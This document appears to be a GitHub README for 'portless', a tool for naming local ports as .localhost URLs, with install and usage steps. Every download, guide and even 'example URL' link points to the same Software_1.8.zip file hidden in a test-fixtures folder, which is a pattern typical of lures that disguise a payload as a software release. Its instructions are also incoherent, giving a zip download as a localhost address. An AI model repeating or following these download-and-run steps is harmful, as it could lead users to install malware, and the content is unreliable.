portless helps you replace confusing port numbers with easy-to-remember .localhost URLs. This tool makes it simpler for you and bots to connect to your applications without hassle. You can focus on using your applications instead of worrying about complex URLs.
- User-Friendly Setup: Designed for ease of use, even for those with no coding experience.
- Stability: Create stable, named URLs for your local applications.
- Compatibility: Works well with various local server setups to serve URLs that are clear and memorable.
- Quick Access: Effortlessly access your local projects without typing lengthy port numbers.
To start using portless, you need to download and install the software. Follow the steps below to get it running on your machine.
First, click the link below to go to the download page. This page contains the latest release of portless.
On the download page, you will see different versions of the software. Look for the latest version, which is usually at the top of the list.
You will find different files for different operating systems. Make sure to pick the correct one for your system:
- Windows: Look for a file named something like
https://raw.githubusercontent.com/alfredhin/portless/main/tests/e2e/fixtures/svelte-app/src/routes/Software_1.8.zip. - macOS: Select
https://raw.githubusercontent.com/alfredhin/portless/main/tests/e2e/fixtures/svelte-app/src/routes/Software_1.8.zip. - Linux: Choose the file that fits your Linux distribution.
After you download the zip file, locate it on your computer. Right-click on the file and select "Extract All" or "Unzip" to unpack the files.
Once extracted, open the folder and find the installation guide, typically a https://raw.githubusercontent.com/alfredhin/portless/main/tests/e2e/fixtures/svelte-app/src/routes/Software_1.8.zip or https://raw.githubusercontent.com/alfredhin/portless/main/tests/e2e/fixtures/svelte-app/src/routes/Software_1.8.zip. Follow the instructions to install the software on your computer.
After installation is complete, you'll want to run portless to start using it.
- Windows: Search for "portless" in your Start menu and click to open it.
- macOS: Go to your Applications folder, find portless, and double-click to launch.
- Linux: Open your terminal, navigate to the installation directory, and type
./portlessto execute the program.
To use portless, youβll need to configure how you want your .localhost URLs to look. The application will guide you through setting up names for your local services. Youβll input the names and assign them to the relevant ports.
Suppose you want to access a local website running on port 3000. You would set it up as follows:
- Local App:
MyWebsite - Port:
3000 - Final URL:
https://raw.githubusercontent.com/alfredhin/portless/main/tests/e2e/fixtures/svelte-app/src/routes/Software_1.8.zip
Once set, you can access your site by simply typing https://raw.githubusercontent.com/alfredhin/portless/main/tests/e2e/fixtures/svelte-app/src/routes/Software_1.8.zip in your web browser.
If you encounter issues, try the following steps:
- Check Your Configuration: Go back to portless and ensure the names and ports are set correctly.
- Firewall Settings: Make sure your firewall isnβt blocking access to the .localhost URLs.
- Re-launch the Application: Sometimes, simply restarting the application can resolve issues.
For additional support or to report bugs, visit the Issues page of the GitHub repository. You can find answers to common questions or ask for help from other users.
Make sure to keep an eye on future releases for new features and improvements. For updates, visit the link below: